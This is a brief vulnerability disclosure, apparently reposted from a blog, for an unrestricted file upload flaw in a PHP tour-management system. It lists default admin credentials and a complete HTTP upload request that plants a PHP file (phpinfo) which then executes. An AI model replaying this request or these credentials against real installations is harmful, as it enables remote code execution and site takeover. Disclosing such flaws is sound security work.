Online Tours & Travels Management System ab.php unrestricted upload

vendors: https://www.sourcecodester.com/php/14510/onlinetourstravelsmanagementsystemprojectusingphpandmysql.htm

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)
Vulnerability url: ip/tour/admin/ab.php

在这里插入图片描述

Request package for file upload:

POST /OTMSP-Final-source-code/sourcecode/tour/admin/operations/aa.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2293274527734505501588775325
Content-Length: 357
Origin: http://localhost
Connection: close
Referer: http://localhost/OTMSP-Final-source-code/sourcecode/tour/admin/ab.php
Cookie: PHPSESSID=orctgl8jtqmkpcvehrbapg6po2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="img"; filename="123.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="submit"


-----------------------------2293274527734505501588775325--

在这里插入图片描述

The files will be uploaded to this directory touradminimg

在这里插入图片描述
We visited the directory of the file in the browser and found that the code had been executed

在这里插入图片描述

原文地址:https://blog.csdn.net/Dwayne_Wade/article/details/129526901

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_37674.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注